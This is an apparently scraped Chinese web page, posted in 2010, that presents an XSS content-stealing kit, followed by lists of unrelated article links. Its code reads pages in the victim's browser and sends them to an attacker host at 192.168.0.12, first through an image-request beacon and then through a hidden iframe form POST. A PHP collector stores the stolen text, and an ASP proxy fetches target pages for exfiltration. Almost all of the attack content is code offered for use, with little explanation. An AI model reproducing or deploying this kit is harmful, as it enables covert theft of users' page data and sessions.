xss文件页面内容读取(解决)


Posted in Javascript onNovember 28, 2010

js:

document.body.addBehavior("#default#Download"); 
var mycars = new Array(); 
mycars[0] = "l.htm"; 
mycars[1] = "y.htm"; 
for (x in mycars ) 
{ 
if(document.body.startDownload(mycars[x],GetData)){ 
GetData(source); 
} 
} function GetData(source) 
{ 
txt=escape(source); 
getReaded(txt); 
} 
function getReaded(usr) { 
var newimg = new Image(); 
newimg.src="http://192.168.0.12/style.php?key="+"\n"+"\n"+usr+"\n"+"\n"; 
}

php:

<?php 
header('Content-Type:text/html;charset=GB2312'); 
function unescape($str) { 
$str = rawurldecode($str); 
preg_match_all("/%u.{4}|&#x.{4};|&#\d+;|.+/U",$str,$r); 
$ar = $r[0]; 
foreach($ar as $k=>$v) { 
if(substr($v,0,2) == "%u") 
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,-4))); 
elseif(substr($v,0,3) == "&#x") 
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,3,-1))); 
elseif(substr($v,0,2) == "&#") { 
$ar[$k] = iconv("UCS-2","UTF-8",pack("n",substr($v,2,-1))); 
} 
} 
return join("",$ar); 
} 
$file="news.html"; 
$_GET['key']=unescape($_GET['key']); 
fputs(fopen($file,'a+'),$_GET['key']); 
?>

=================================================以下通用了===============
<% 
Response.Buffer = True 
Dim sUrlB,send(2) 
send(0)=escape(PageWebProxy("http://192.168.0.5/sohu.htm")) 
send(1)=escape(PageWebProxy("http://192.168.0.5/c.htm")) 
function PageWebProxy(xmlpath) 
Dim i, re, Url, Html 
Url = xmlpath Set re = New RegExp 
re.IgnoreCase = True 
re.Global = True 
sUrlB = Url 
Html = getHTTPPage(Url) 
Url = Left(Url, InStrRev(Url, "/")) 
i = InStr(sUrlB, "?") 
If i > 0 Then 
sUrlB = Left(sUrlB, i - 1) 
End If 
re.Pattern = "(href|action)=(\'|"")?(\?)" 
Html = re.Replace(Html,"$1=$2" & sUrlB & "?") 
re.Pattern = "(src|action|href)=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1x=$2$3$2") 
re.Pattern = "(window\.open|url)\((\'|"")?((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?\)" 
Html = re.Replace(Html,"$1x($2$3$2)") 
re.Pattern = "(src|action|href|background)=(\'|"")?([^\/""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1=$2" & Url & "$3$2") 
re.Pattern = "(src|action|href|background)=(\'|"")?\/([^""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$3$2") 
re.Pattern = "(src|action|href)=(\'|"")?\/(\'|"")?" 
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$2") 
re.Pattern = "(window\.open|url)\((\'|"")?([^\/""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)" 
Html = re.Replace(Html,"$1($2" & Url & "$3$2)") 
re.Pattern = "(window\.open|url)\((\'|"")?\/([^""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)" 
Html = re.Replace(Html,"$1($2http://" & Split(Url, "/")(2) & "/$3$2)") 
Html = Replace(Html, "&", "%26") 
If Split(Url, "/")(2) = "club.isso.com.cn" Then 
Html = Replace(Html, "%26amp;", "%26") 
Else 
Html = Replace(Html, "%26amp;", "&") 
End If 
Html = Replace(Html, "%26nbsp;", " ") 
Html = Replace(Html, "%26lt;", "<") 
Html = Replace(Html, "%26gt;", ">") 
Html = Replace(Html, "%26quot;", """) 
Html = Replace(Html, "%26copy;", "©") 
Html = Replace(Html, "%26reg;", "®") 
Html = Replace(Html, "%26raquo;", "»") 
Html = Replace(Html, "%26%26", "&&") 
Html = Replace(Html, "%26#", "&#") 
' Html = Replace(Html, "%26", "") 
re.Pattern = "(src|action|href)x=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1=$2$3$2") 
re.Pattern = "((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)" '"(gif|jpg|bmp|png))" 
Html = re.Replace(Html,"?url=$1") 
re.Pattern = "\?url=" & Url & "(#|javascript:)" 
Html = re.Replace(Html,"$1") 
re.Pattern = "multipart\/form-data" 
Html = re.Replace(Html,"") 
PageWebProxy=Html 
End function 
Function getHTTPPage(url) 
Dim Http, theStr, fileExt 
Set Http = Server.CreateObject("MSXML2.XMLHTTP") 
If Request.Form.Count > 0 Then 
For Each x In Request.Form 
theStr = theStr & Server.UrlEncode(x) & "=" & Server.UrlEncode(Request.Form(x)) & "&" 
Next 
Http.Open "POST", url, False 
Http.SetRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded" 
Http.Send(theStr) 
Else 
Http.Open "GET", url, False 
Http.Send() 
End If 
If Http.readystate<>4 then Exit Function 
fileExt = LCase(Mid(url, InStrRev(url, ".") + 1)) 
If InStr("$jpg$gif$bmp$png$js$", "$" & fileExt & "$") > 0 Then 
Response.Clear 
Response.BinaryWrite Http.responseBody 
Response.End() 
Else 
If InStr("$rar$mdb$zip$exe$com$ico$", "$" & fileExt & "$") > 0 Then 
Response.AddHeader "Content-Disposition", "Attachment; Filename=" & Mid(sUrlB, InStrRev(sUrlB, "/") + 1) 
Response.BinaryWrite Http.responseBody 
Response.Flush 
Else 
getHTTPPage = bytesToBSTR(Http.responseBody, "GB2312") 
End If 
End If 
Set Http = Nothing 
End Function 
Function BytesToBstr(body,Cset) 
Dim objstream 
Set objstream = Server.CreateObject("adodb.stream") 
objstream.Type = 1 
objstream.Mode =3 
objstream.Open 
objstream.Write body 
objstream.Position = 0 
objstream.Type = 2 
objstream.Charset = Cset 
BytesToBstr = objstream.ReadText 
objstream.Close 
Set objstream = nothing 
End Function 
%> 
document.writeln("<iframe name=\"mimi\" src=about:blank style=display:none><\/iframe>") 
document.writeln("<form id=form action=http:\/\/192.168.0.12\/xss.asp method=POST target=mimi>"); 
document.writeln("<input id=var name=var type=hidden>"); 
document.writeln("<input id=vartwo name=vartwo type=hidden>"); 
document.writeln("<input type=submit style=display:none>"); 
document.writeln("<\/form>") 
document.getElementById("var").value ='http://192.168.0.5/sohu.htm'+unescape('<%=send(0)%>'); 
document.getElementById("vartwo").value ='http://192.168.0.5/c.htm'+unescape('<%=send(1)%>'); 
document.getElementById("form").submit();
Javascript 相关文章推荐
javascript实现 在光标处插入指定内容
May 25 Javascript
javascript 同时在IE和FireFox获取KeyCode的代码
Feb 07 Javascript
基于jquery的无缝循环新闻列表插件
Mar 07 Javascript
js操作iframe兼容各种主流浏览器示例代码
Jul 22 Javascript
js获取IP地址的方法小结
Jul 01 Javascript
强大Vue.js组件浅析
Sep 12 Javascript
webuploader模态框ueditor显示问题解决方法
Dec 27 Javascript
详解Vue.js组件可复用性的混合(mixin)方式和自定义指令
Sep 06 Javascript
使用vue-router为每个路由配置各自的title
Jul 30 Javascript
KOA+egg.js集成kafka消息队列的示例
Nov 09 Javascript
Vue 理解之白话 getter/setter详解
Apr 16 Javascript
小程序实现可拖动的悬浮按钮
Sep 07 Javascript
用js来解决ajax读取页面乱码
Nov 28 #Javascript
window.name代替cookie的实现代码
Nov 28 #Javascript
在一个js文件里远程调用jquery.js会在ie8下的一个奇怪问题
Nov 28 #Javascript
一个网马的tips实现分析
Nov 28 #Javascript
JQUBAR1.1 jQuery 柱状图插件发布
Nov 28 #Javascript
为jQuery增加join方法的实现代码
Nov 28 #Javascript
Jquery拖拽并简单保存的实现代码
Nov 28 #Javascript
You might like
mysql_fetch_assoc和mysql_fetch_row的功能加起来就是mysql_fetch_array
2007/01/15 PHP
php 获取SWF动画截图示例代码
2014/02/10 PHP
PHP图片自动裁切应付不同尺寸的显示
2014/10/16 PHP
php析构函数的简单使用说明
2015/08/24 PHP
php 实现Hash表功能实例详解
2016/11/29 PHP
PHP对象相关知识总结
2017/04/09 PHP
PHP中检查isset()和!empty()函数的必要性
2019/02/13 PHP
Laravel5.7 Eloquent ORM快速入门详解
2019/04/12 PHP
基于jsTree的无限级树JSON数据的转换代码
2010/07/27 Javascript
JavaScript中的isXX系列是否继续使用的分析
2011/04/16 Javascript
jQuery数据类型小结(14个)
2016/01/08 Javascript
JavaScript中自带的 reduce()方法使用示例详解
2016/08/10 Javascript
IONIC自定义subheader的最佳解决方案
2016/09/22 Javascript
angular使用bootstrap方法手动启动的实例代码
2017/07/18 Javascript
vue 动态改变静态图片以及请求网络图片的实现方法
2018/02/07 Javascript
Vue 全家桶实现移动端酷狗音乐功能
2018/11/16 Javascript
如何实现一个简易版的vuex持久化工具
2019/09/11 Javascript
Python Selenium 之关闭窗口close与quit的方法
2019/02/13 Python
PyQt5基本控件使用详解:单选按钮、复选框、下拉框
2019/08/05 Python
利用Python实现字幕挂载(把字幕文件与视频合并)思路详解
2020/10/21 Python
HTML5 贪吃蛇游戏实现思路及源代码
2013/09/03 HTML / CSS
澳大利亚首个在线预订旅游网站:Wotif
2017/07/19 全球购物
DJI大疆德国官方商城:大疆无人机
2018/09/01 全球购物
沃尔玛加拿大:Walmart.ca
2020/03/02 全球购物
追悼会上的答谢词
2014/01/10 职场文书
出国导师推荐信
2014/01/16 职场文书
商业活动邀请函
2014/02/04 职场文书
铣床操作工岗位职责
2014/06/13 职场文书
幼儿园保育员责任书
2014/07/22 职场文书
党的群众路线专项整治方案
2014/11/03 职场文书
2015年环境监察工作总结
2015/07/23 职场文书
浅谈MySQL 亿级数据分页的优化
2021/06/15 MySQL
python字典的元素访问实例详解
2021/07/21 Python
JavaScript中MutationObServer监听DOM元素详情
2021/11/27 Javascript
深入理解go缓存库freecache的使用
2022/02/15 Golang
Ruby序列化和持久化存储 Marshal和Pstore介绍
2022/04/18 Ruby